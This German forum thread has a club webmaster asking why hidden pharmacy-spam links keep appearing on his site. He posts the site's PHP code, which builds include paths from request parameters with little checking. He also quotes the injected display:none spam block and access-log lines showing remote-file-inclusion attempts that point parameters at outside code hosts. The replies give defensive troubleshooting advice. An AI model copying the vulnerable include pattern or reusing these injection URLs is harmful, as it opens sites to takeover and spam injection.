 | 
21.09.2007, 09:01
| Nach oben
#1 | | Benutzer
Registriert seit: 18.09.2006
Beiträge: 50
|  Website wird manipuliert, nur wie?
Hallo zusammen,
Ich betreue zusammen mit einem Bekannten eine Vereins-Homepage. Mir ist in letzter Zeit aufgefallen, dass bei einigen statischen HTML-Seiten zu unterst, irgendwelche Spam-Links auftauchen! Zitat:
<u style=display:none>
<a href="http://www.northnorway.org/images/banners/.o/index.php">cialis</a>
<a href="http://www.northnorway.org/images/banners/.o/?page=1">buy cialis online</a>
| Ich habe ehrlich gesagt keine Ahnung, wie dies passieren konnte.
Das HTML-File kann vom Webserver nicht geschrieben werden, darum vermute ich eher, dass der "Angriff" per FTP erfolgt.
Ich poste trotzdem mal die index.php, vielleicht sieht ja jemand einen "Schnitzer". Wie gesagt, der Code ist nicht von mir..  PHP-Code: <?php
session_start();
if ((preg_match('/^([1-5]{1})|(inter)|(infos)$/', $_GET['team_id'])) || $_GET['team_id']=="") $team_id = $_GET['team_id'];
else $team_id = "3";
if ((preg_match('/[a-z]{4,12}$/', $_GET['cat'])) || $_GET['cat']=="") $cat = $_GET['cat'];
else $cat = "seasons";
if ((preg_match('/^[a-z0-9]*$/', $_GET['date'])) || $_GET['date']=="") $date = $_GET['date'];
else $date = "";
if ((preg_match('/^[0-9]{4}$/', $_GET['year'])) || $_GET['year']=="") $year = $_GET['year'];
else $year = "0506";
if ((preg_match('/^[a-z0-9]*$/', $_GET['game'])) || $_GET['game']=="") $game = $_GET['game'];
else $game = "060430srlblp";
if ((preg_match('/^[0-9]{1,4}$/', $_GET['player'])) || $_GET['player']=="") $player = $_GET['player'];
else $player = "";
if ((preg_match('/^[a-z]*$/', $_GET['site'])) || $_GET['site']=="") $site = $_GET['site'];
else $site = "";
if ((preg_match('/^[a-z]*$/', $_GET['country'])) || $_GET['country']=="") $country = $_GET['country'];
else $country = "";
?>
<html>
<head>
<title><?php include "templates/title.php"; ?></title>
<meta name="description" content="Die Homepage des Strassenhockey Clubs Belpa 1107. Hier finden Sie alles, von Spielberichten, Statistiken, dem aktuellen Kader und vielem mehr." />
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<link rel="stylesheet" href="shared/belpa.css" />
<link rel="shortcut icon" href="shared/belpa.ico">
</head>
<body onload="if (self != top) top.location = self.location">
<table border="0" cellspacing="0" cellpadding="10" align="center">
<colgroup><col width="130" /><col width="690" /><col width="180" /></colgroup>
<tr>
<td class="lefttopbg"><a href="index.php" id="top"><img src="shared/space.gif" height="100" width="130" alt="" /></a></td>
<?php if ($team_id==1) echo ("<td style=\"background-image: url(shared/belp1.jpg);\">");
else if ($team_id==2) echo ("<td style=\"background-image: url(shared/belp2.jpg);\">");
else if ($team_id==3) echo ("<td style=\"background-image: url(shared/juna.jpg);\">");
else if ($team_id==4) echo ("<td style=\"background-image: url(shared/junb.jpg);\">");
else if ($team_id==5) echo ("<td style=\"background-image: url(shared/junc.jpg);\">");
else if ($team_id=="infos") echo ("<td style=\"background-image: url(shared/infos.jpg);\">");
else if ($team_id=="inter") echo ("<td style=\"background-image: url(shared/inter.jpg);\">");
else echo ("<td style=\"background-image: url(shared/start.jpg);\">");
?>
<img src="shared/space.gif" height="100" width="450" alt="" /></td>
<td class="righttopbg"><img src="shared/space.gif" height="100" width="180" alt="" /></td>
</tr>
<tr>
<td class="leftbg"><?php include("templates/menu.php"); ?></td>
<td>
<table class="fullsize" border="0" cellspacing="0" cellpadding="0">
<?php
$file=$team_id."/".$cat."/";
if ($cat=="seasons"){
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include $file.$year."/".$game.".php";
}
else if ($cat=="team") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include "templates/teams.php";
}
else if ($cat=="stats") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include "templates/stats.php";
}
else if ($cat=="shcbelpa" || $cat=="streethockey" || $cat=="sponsoring" || $cat=="spieler") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include $file.$site.".php";
}
else if ($cat=="news") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include $file.$date.".php";
}
else if ($cat=="links") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include $file.$country.".php";
}
else if ($cat=="mail") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include $team."/".$cat.".php";
}
else if ($cat=="mailer") {
echo ("<colgroup><col width=\"100%\" /></colgroup><tr><td>");
include $team."/".$cat.".php";
}
else{
echo ("<colgroup><col width=\"70%\" /><col width=\"3%\" /><col width=\"27%\" /></colgroup><tr><td>");
$file="templates";
include("templates/teaser.html");
include("templates/news.php");
echo("</td><td> </td><td>");
include("templates/results.php");
}
?>
</td></tr></table>
</td>
<td class="rightbg"><?php $file=$file."/link.inc"; include $file; ?></td>
</tr>
<tr>
<td class="leftbottombg" colspan="2"><a class="menu" href="mailto: mail@shcbelpa.ch">© SHC Belpa 1107</a></td>
<td class="rightbottombg"> </td>
</tr>
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-2562106-1";
urchinTracker();
</script>
</body>
</html>
<u style=display:none><a href="http://www.northnorway.org/images/banners/.o/index.php">cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=1">buy cialis online</a><a href="http://www.northnorway.org/images/banners/.o/?page=2">buy cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=3">online cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=4">order cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=5">cialis levitra</a><a href="http://www.northnorway.org/images/banners/.o/?page=6">generic cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=7">cheap cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=8">viagra cialis levitra</a><a href="http://www.northnorway.org/images/banners/.o/?page=9">cialis tadalafil</a><a href="http://www.northnorway.org/images/banners/.o/?page=10">cialis generic viagra</a><a href="http://www.northnorway.org/images/banners/.o/?page=11">cialis side effects</a>
<a href="http://www.northnorway.org/images/banners/.o/?page=12">cialis com</a><a href="http://www.northnorway.org/images/banners/.o/?page=13">cialis sample</a><a href="http://www.northnorway.org/images/banners/.o/?page=14">approval cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=15">cialis 20mg</a><a href="http://www.northnorway.org/images/banners/.o/?page=16">cialis drug</a><a href="http://www.northnorway.org/images/banners/.o/?page=17">cialis comparison levitra viagra</a><a href="http://www.northnorway.org/images/banners/.o/?page=18">cialis lilly</a><a href="http://www.northnorway.org/images/banners/.o/?page=19">cialis for sale</a><a href="http://www.northnorway.org/images/banners/.o/?page=20">cialis drug viagra vs</a><a href="http://www.northnorway.org/images/banners/.o/?page=21">free cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=22">purchase cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=23">buy cheap cialis</a>
<a href="http://www.northnorway.org/images/banners/.o/?page=24">cheapest cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=25">cialis st</a><a href="http://www.northnorway.org/images/banners/.o/?page=26">cialis eli lilly</a><a href="http://www.northnorway.org/images/banners/.o/?page=27">cialis levitra viagra vs</a><a href="http://www.northnorway.org/images/banners/.o/?page=28">viagra cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=29">cialis online pharmacy</a><a href="http://www.northnorway.org/images/banners/.o/?page=30">liquid cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=31">cialis fda</a><a href="http://www.northnorway.org/images/banners/.o/?page=32">cialis icos</a><a href="http://www.northnorway.org/images/banners/.o/?page=33">cialis news</a><a href="http://www.northnorway.org/images/banners/.o/?page=34">cialis uk</a><a href="http://www.northnorway.org/images/banners/.o/?page=35">cialis levitra vs</a>
<a href="http://www.northnorway.org/images/banners/.o/?page=36">generic cialis tadalafil</a><a href="http://www.northnorway.org/images/banners/.o/?page=37">cialis prescription</a><a href="http://www.northnorway.org/images/banners/.o/?page=38">buy discount cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=39">cialis levitra sales viagra</a><a href="http://www.northnorway.org/images/banners/.o/?page=40">buy cialis now</a><a href="http://www.northnorway.org/images/banners/.o/?page=41">buying generic cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=42">airfox cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=43">cialis soft tab</a><a href="http://www.northnorway.org/images/banners/.o/?page=44">discount cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=45">cheapest cialis generic</a><a href="http://www.northnorway.org/images/banners/.o/?page=46">cialis levitra viagra vs vs</a>
<a href="http://www.northnorway.org/images/banners/.o/?page=47">cheap generic cialis</a><a href="http://www.northnorway.org/images/banners/.o/?page=48">cialis online discount</a><a href="http://www.northnorway.org/images/banners/.o/?page=49">buy tadalafil cialis</a></u> | 
|  | |
21.09.2007, 12:51
| Nach oben
#2 | | Benjamin Steininger
Registriert seit: 02.06.2005 Ort: weiher im tiefsten Odenwald
Beiträge: 1.204
|
Laufen andere Komponenten auf dem Webspace ? Forum ? Gästebuch ? .....
mal die Logdateien kontrolliert und geschaut ob komische Zugriffe (z.b. libperl oder so als browser .... ? ) vorhanden sind ?
| |
| | |
21.09.2007, 16:44
| Nach oben
#3 | | Benutzer
Registriert seit: 18.09.2006
Beiträge: 50
|
Zitat:
Zitat von robo47  Laufen andere Komponenten auf dem Webspace ? Forum ? Gästebuch ? ..... | Mh ja, ein phpBB, aber dass läuft unter einer anderen Domain, ist also komplett getrennt (ist eine Plesk-Installation). Zitat:
Zitat von robo47 mal die Logdateien kontrolliert und geschaut ob komische Zugriffe (z.b. libperl oder so als browser .... ? ) vorhanden sind ? | Muss ich mal kontrollieren.. Keine Ahnung ob ich Zugriff auf diese Logfiles habe!
gruss,
c!w
| |
| | |
21.09.2007, 16:51
| Nach oben
#4 | | Benjamin Klaile
Registriert seit: 02.12.2004 Ort: Remagen
Beiträge: 4.516
|
Vielleicht mal alle, die die FTP-Daten haben aushorchen, Zugangsdaten und Passwörter so weit wie möglich ändern und mal schauen, ob das dann immer noch auftritt.
Komisches Problem. | |
| | |
21.09.2007, 17:20
| Nach oben
#5 | | Benjamin Steininger
Registriert seit: 02.06.2005 Ort: weiher im tiefsten Odenwald
Beiträge: 1.204
|
Zitat:
Zitat von chrigu Zitat:
Zitat von robo47 mal die Logdateien kontrolliert und geschaut ob komische Zugriffe (z.b. libperl oder so als browser .... ? ) vorhanden sind ? | Muss ich mal kontrollieren.. Keine Ahnung ob ich Zugriff auf diese Logfiles habe!
gruss,
c!w | Wenn du bei nem Hoster keinen Zugriff auf die normalen Logs hättest, wäre das sehr komisch.
| |
| | |
22.09.2007, 09:17
| Nach oben
#6 | | Benutzer
Registriert seit: 18.09.2006
Beiträge: 50
|
[quote=robo47;55793] Zitat:
Zitat von chrigu Wenn du bei nem Hoster keinen Zugriff auf die normalen Logs hättest, wäre das sehr komisch. | Ja stimmt, habe die Logs gefunden. Es hat schon komische Einträge, habe mal nach "perl" gegrept. Zitat:
212.241.214.84 - - [13/Aug/2007:14:34:11 +0200] "GET /main.php?site=http://kepegawaian.jatim.go.id/images/cmdx.txt? HTTP/1.1" 404 957 "-" "libwww-perl/5.803"
87.229.7.154 - - [15/Aug/2007:03:42:59 +0200] "GET /index.php?cat=http://www.relax.lu/photoen_php/nav? HTTP/1.1" 200 6085 "-" "libwww-perl/5.805"
195.70.40.120 - - [15/Aug/2007:03:55:01 +0200] "GET /index.php?cat=http://www.relax.lu/photoen_php/nav? HTTP/1.1" 200 6085 "-" "libwww-perl/5.803"
217.79.111.122 - - [18/Aug/2007:13:39:07 +0200] "GET /index.php?team=infos&cat=streethockey&site=main/main.php?content=http://www.design-l0ve.net/.smileys/smiley18.gif? HTTP/1.1" 200 5972 "-" "libwww-perl/5.808"
217.79.111.122 - - [18/Aug/2007:13:39:07 +0200] "GET /main.php?content=http://www.design-l0ve.net/.smileys/smiley18.gif? HTTP/1.1" 404 957 "-" "libwww-perl/5.808"
72.232.216.162 - - [18/Aug/2007:19:25:24 +0200] "GET /main.php?main=http://www.shababalordon.com/modules/4nAlbum/album/x? HTTP/1.1" 404 957 "-" "libwww-perl/5.803"
209.62.123.34 - - [19/Aug/2007:18:27:59 +0200] "GET /index.php?team_id=http://85.92.144.90/index.html.nx/nav? HTTP/1.1" 200 12227 "-" "libwww-perl/5.808"
81.169.168.26 - - [31/Aug/2007:18:08:31 +0200] "GET /index.php?team_id=infos&cat=news&date=shownews&new s_id=1//phpns/shownews.php?id=http://digerati.com.br//macmais/banner/banner/x7.gif? HTTP/1.1" 200 8463 "-" "libwww-perl/5.69"
81.169.168.26 - - [31/Aug/2007:18:08:32 +0200] "GET //phpns/shownews.php?id=http://digerati.com.br//macmais/banner/banner/x7.gif? HTTP/1.1" 404 957 "-" "libwww-perl/5.69"
203.126.23.51 - - [31/Aug/2007:20:34:40 +0200] "GET /index.php?cat=http://restorato.ru/b? HTTP/1.1" 200 8794 "-" "libwww-perl/5.79"
| Die Einträge sind aber alle sehr alt! Sowieso sind das ja nur Versuche.
Die Manipulationen waren viel früher, sprich vor einer Woche.
Nach was könnte ich die Logs noch durchsuchen?
Gruss,
Chrigu
| |
| | |
22.09.2007, 13:38
| Nach oben
#7 | | Benjamin Steininger
Registriert seit: 02.06.2005 Ort: weiher im tiefsten Odenwald
Beiträge: 1.204
|
Auch wenn sie älter sind, kann damals schon irgendwo versteckt in einem Verzeichnis in einer anderen Datei, der Grundstein gelegt worden sein für das was jetzt passiert ist.
Ich würde mir weiter die Logs anschauen, ob du halt irgendwas auffälliges findest, ansonsten erstmal alle Passwörter die es gibt ändern, wenn es dann immer noch passiert ein komplettes Backup aller Dateien (auch eventuell versteckte Dateien die dir dein FTP vielleicht nicht anzeigt!) die oben liegen machen und dann ein Code-Review aller Dateien.
Du hattest weiter oben erwähnt, dass du dort auch noch ein phpbb und so laufen hast, jenachdem wie der hoster seine Struktur aufgebaut hat besonders die openbasedir-Einstellung von PHP, kann es auch wenn sie in völlig verschiedenen Verzeichnissen liegen und nicht ineinander verschachtelt sind, dass trotzdem Zugriffe möglich sind. Wenn der Hoster hier vielleicht auch zu wenig abgesichert hat, könnte auch eine andere Person die irgendeine Webspace auf dem Server hat, ein Script haben, dass darauf zugreift und deine Datei verändert.
| |
| | |
23.09.2007, 19:45
| Nach oben
#8 | | Jann Hendrik Bekaan
Registriert seit: 02.12.2004 Ort: Wildeshausen
Beiträge: 2.378
|
Ich habe den thread mal verschoben, weil er irgendwie in der Plauderecke doch fehl am Platze ist....
| |
| | |
Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1) | | | | Themen-Optionen | Thema durchsuchen | | | | 
Forumregeln
| Es ist dir nicht erlaubt, neue Themen zu verfassen. Es ist dir nicht erlaubt, auf Beiträge zu antworten. Es ist dir nicht erlaubt, Anhänge hochzuladen. Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.
HTML-Code ist aus. | | | Alle Zeitangaben in WEZ +1. Es ist jetzt 14:29 Uhr.
| 
Ähnliche Themen